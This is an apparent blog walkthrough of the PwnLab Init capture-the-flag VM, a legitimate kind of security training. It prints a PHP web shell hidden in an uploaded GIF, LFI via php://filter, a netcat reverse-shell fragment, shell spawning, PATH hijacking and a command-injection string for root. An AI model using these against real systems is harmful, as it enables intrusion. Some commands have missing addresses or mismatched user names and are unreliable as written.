CTF: PwnLab Init Walkthrough


CTF: PwnLab Init Walkthrough


In this walkthrough, I’ll be using Parrot OS. I’ll break each vulnerability down and explain it. The video won’t demonstrate all of the techniques that could have been applied. I will also list the techniques I’ve learned from others.

Exploits / Techniques

  • Local File Inclusions (LFI)
  • Password Reuse
  • Privilege Elevation through compiled code.
  • Remote Code Execution
  • Reverse Shell
  • Spawning Interactive Shells



First Identify the Virtual Machine (VM) server by using NetDiscover.

sudo netdiscover -r
Discovering the PwnLab Init VM


Use Nikto to scan the website for general information and exploits.

nikto --host

In the below results you can see the Nikto found the config.php file. We’ll get the database credentials out of that file.

(nikto scan results)

Local File Inclusion

The actual code we will be exploiting will be an include that looks as if it’s supposed to load a language file through a cookie. There are comments that this code is unfinished.

if (isset($_COOKIE['lang']))

PHP Base Filter

This exploit uses the php://filter/convert.base64-encode conversion filter. This filter runs before the file is included. Since this filter encodes everything to base64 we are able to view files on the server before they are processed.  

Then we can get the configuration file which contains the MySQL database connection information.

Uploading and Exploiting Using an Image

Create an image using vim and insert this into the .gif file.

<?php system($_GET["cmd"]) ?>

Then upload the image and retrieve the image path by right clicking and inspecting the image.

Using the Console in FireFox I was able to set the Cookie which loads the image on the website. This will allow us remote code execution.


Using the file inclusion we are able to enumerate the users on the host machine by returning the /etc/passwd.

Gaining Access to the MySQL Database

mysql -h -u root -p  

Reverse Shell

The reverse shell is accomplished through the local file inclusion vulnerability.

nc -nvlp 4444

After Netcat is set up to listen on port 4444 you can paste the below code into the browser and it should pop a reverse shell.

Note: is the virtual machine we are attacking. is the host machine that I’m running Parrot OS on. -nv 4444 -e /bin/bash

Spawn Interactive Shell

python -c 'import pty; pty.spawn("/bin/bash")'

Privilege Elevation

This part is rather tricky. I had to have some help and followed Abatchy’s (Mohamed Shahat) technique on this one. His post is worth reading, he tries several other techniques and lists more information than this post.


Login as Kane

su kent
Password: JWzXuBJJNy 

In Kane’s home folder there is a msgmike file.

Upon inspecting the file you can see that something in the file runs something similar to “cat /home/mike/msg.txt”.

strings msgmike 

The actual exploit here is to create a shell script called cat and export it in the environmental variables that way it runs instead of the system’s cat program. This needs to be done in Kane’s folder.

echo "/bin/bash" > cat
chmod 777 cat
export PATH=/home/kane

Will return something funny like “bash: dircolors: command not found”.

Then you need to reset your export PATH variable.

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
cd ../mike
ls -al
**opensesame; bash -p

Capture The Flag